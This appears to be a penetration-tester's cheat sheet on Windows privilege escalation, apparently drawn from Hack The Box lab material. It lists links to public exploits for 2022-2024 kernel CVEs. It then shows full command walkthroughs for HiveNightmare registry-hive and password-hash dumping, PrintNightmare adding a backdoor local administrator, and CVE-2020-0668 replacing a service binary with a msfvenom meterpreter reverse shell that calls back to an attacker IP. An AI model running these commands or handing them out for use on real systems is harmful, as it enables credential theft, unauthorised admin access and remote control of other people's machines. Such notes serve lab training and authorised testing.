Kernel / Drivers Exploits

All LPE exploits starting from 2023

Exploit CVE

CVE-2024-49138

Tested on Windows 11 23h2.

GitHub - MrAle98/CVE-2024-49138-POC: POC exploit for CVE-2024-49138GitHub

CVE-2024-38193

Tested on Windows 11 Pro 23H2 22631.3447

GitHub - killvxk/CVE-2024-38193-NephsterGitHub

CVE-2024-35250 - Untrusted Pointer Dereference in the ks.sys driver

https://github.com/varwara/CVE-2024-35250?s=03github.com

CVE-2024-30088

GitHub - tykawaii98/CVE-2024-30088GitHub

CVE-2024-30085

Affected Versions: Windows 11 23H2

GitHub - Adamkadaban/CVE-2024-30085: CVE-2024-30085GitHub

CVE-2024-30090 - LPE PoC

GitHub - Dor00tkit/CVE-2024-30090: CVE-2024-30090 - LPE PoCGitHub

CLFS PE - Windows 11

SSD Advisory - Common Log File System (CLFS) driver PE - SSD Secure DisclosureSSD Secure Disclosure

CVE-2023-21752 - Critical

GitHub - Wh04m1001/CVE-2023-21752GitHub

Windows 11 10.0.22000 - Backup service Privilege EscalationExploit Database

CVE-2023-36874

GitHub - Wh04m1001/CVE-2023-36874GitHub

CVE-2023-36802

Windows 11 22H2 systems

GitHub - chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802: LPE exploit for CVE-2023-36802GitHub

CVE-2023-29360

Exploit targeting MSKSSRV.SYS driver

GitHub - Nero22k/cve-2023-29360: Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driverGitHub

CVE-2023-28252

Works on Windows 11 21H2 clfs.sys version 10.0.22000.1574 - also works on Windows 10 21H2, Windows 10 22H2, Windows 11 22H2 and Windows server 2022

GitHub - duck-sec/CVE-2023-28252-Compiled-exe: A modification to fortra's CVE-2023-28252 exploit, compiled to exeGitHub

GitHub - fortra/CVE-2023-28252GitHub

CVE-2023-21768

GitHub - chompie1337/Windows_LPE_AFD_CVE-2023-21768: LPE exploit for CVE-2023-21768GitHub

CVE-2022-21882

Tested on windows 20h2 19042.1415

GitHub - KaLendsi/CVE-2022-21882: win32k LPEGitHub

GitHub - L4ys/CVE-2022-21882GitHub

Notable Vulnerabilities

MS08-067

Windows Server 2000, 2003, and 2008 and Windows XP and Vista and allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges

HTB: Legacy0xdf hacks stuff

MS17-010

SMBv1 protocol mishandles packets specially crafted by an attacker, leading to arbitrary code execution on the target host as the SYSTEM account.

HTB: Blue0xdf hacks stuff

Windows Exploit

ALPC Task Scheduler 0-Day

https://blog.grimm-co.com/2020/05/alpc-task-scheduler-0-day.htmlblog.grimm-co.com

Hackback - Hack The Boxsnowscan.io

CVE-2021-36934 HiveNightmare, aka SeriousSam

Windows 10 flaw that results in ANY user having rights to read the Windows registry and access sensitive information regardless of privilege level. Researchers quickly developed a PoC exploit to allow reading of the SAM, SYSTEM, and SECURITY registry hives and create copies of them to process offline later and extract password hashes (including local admin) using a tool such as SecretsDump.py

Detection

HiveNightmare/Mitigation.ps1 at master · GossiTheDog/HiveNightmareGitHub

Checking Permissions on the SAM File

C:\htb> icacls c:\Windows\System32\config\SAM

C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

SAM file is readable by the BUILTIN\Users group

Exploit

GitHub - GossiTheDog/HiveNightmare: Exploit allowing you to read registry hives as non-admin on Windows 10 and 11GitHub

https://github.com/GossiTheDog/HiveNightmare/raw/master/Release/HiveNightmare.exegithub.com

PS C:\Users\htb-student\Desktop> .\HiveNightmare.exe

HiveNightmare v0.6 - dump registry hives as non-admin users

Specify maximum number of shadows to inspect with parameter if wanted, default is 15.

Running...

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

Success: SAM hive from 2021-08-07 written out to current working directory as SAM-2021-08-07

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY

Success: SECURITY hive from 2021-08-07 written out to current working directory as SECURITY-2021-08-07

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM

Success: SYSTEM hive from 2021-08-07 written out to current working directory as SYSTEM-2021-08-07


Assuming no errors above, you should be able to find hive dump files in current working directory.

impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local

SAM & LSA secrets

CVE-2021-1675/CVE-2021-34527 PrintNightmare

Windows Exploit

Remotely

GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527GitHub

Powershell

GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)GitHub

By default, this script adds a new local admin user, but we can also supply a custom DLL to obtain a reverse shell or similar if adding a local admin user is not in scope.

Checking for Spooler Service

PS C:\htb> ls \\localhost\pipe\spoolss


    Directory: \\localhost\pipe


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
                                                  spoolss

Adding Local Admin with PrintNightmare PowerShell PoC

Bypass Powershell Execution Policy

PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A

PS C:\htb> Import-Module .\CVE-2021-1675.ps1
PS C:\htb> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am
d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
[+] added user hacker as local administrator
[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll

PS C:\htb> net user hacker

User name                    hacker
Full Name                    hacker
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            ?8/?9/?2021 12:12:01 PM
Password expires             Never
Password changeable          ?8/?9/?2021 12:12:01 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.

Enumerating Missing Patches

PS C:\htb> systeminfo
PS C:\htb> wmic qfe list brief
PS C:\htb> Get-Hotfix

We can search for each KB (Microsoft Knowledge Base ID number) in the Microsoft Update Catalog to get a better idea of what fixes have been installed and how far behind the system may be on security updates.

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next GenerationGitHub

CVE-2020-0668 Example

CVE-2020-0668 - A Trivial Privilege Escalation Bug in Windows Service Tracingitm4n’s blog

C:\htb> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

GitHub - RedCursorSecurityConsulting/CVE-2020-0668: Use CVE-2020-0668 to perform an arbitrary privileged file move operation.GitHub

Building the solution should create the following files.

CVE-2020-0668.exe
CVE-2020-0668.exe.config
CVE-2020-0668.pdb
NtApiDotNet.dll
NtApiDotNet.xml

Pre-compiled:

GitHub - 0xSs0rZ/Windows_Exploit: CVE-2021-1675/CVE-2021-34527 PrintNightmare & CVE-2020-0668GitHub

File folder on MEGAmega.nz

We can use the exploit to create a file of our choosing in a protected folder such as C:\Windows\System32. We aren't able to overwrite any protected Windows files. This privileged file write needs to be chained with another vulnerability, such as UsoDllLoader or DiagHub to load the DLL and escalate our privileges. However, the UsoDllLoader technique may not work if Windows Updates are pending or currently being installed, and the DiagHub service may not be available.

We can also look for any third-party software, which can be leveraged, such as the Mozilla Maintenance Service. This service runs in the context of SYSTEM and is startable by unprivileged users. The (non-system protected) binary for this service is located below.

• C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

C:\htb> icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                                          BUILTIN\Administrators:(I)(F)
                                                                          BUILTIN\Users:(I)(RX)
                                                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                                          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files

Generating Malicious Binary

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe

Running the Exploit

C:\htb> C:\Tools\CVE-2020-0668\CVE-2020-0668.exe C:\Users\htb-student\Desktop\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"                                       

[+] Moving C:\Users\htb-student\Desktop\maintenanceservice.exe to C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

[+] Mounting \RPC Control onto C:\Users\htb-student\AppData\Local\Temp\nzrghuxz.leo
[+] Creating symbol links
[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.
[+] Sleeping for 5 seconds so the changes take effect
[+] Writing phonebook file to C:\Users\htb-student\AppData\Local\Temp\179739c5-5060-4088-a3e7-57c7e83a0828.pbk
[+] Cleaning up
[+] Done!

C:\htb> icacls 'C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe'

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(F)
                                                                          BUILTIN\Administrators:(F)
                                                                          WINLPE-WS02\htb-student:(F)

Replacing File with Malicious Binary

C:\htb> copy /Y C:\Users\htb-student\Desktop\maintenanceservice2.exe "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

Exploitation

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST <our_ip>
set LPORT 8443
exploit

sudo msfconsole -r handler.rc 

C:\htb> net start MozillaMaintenance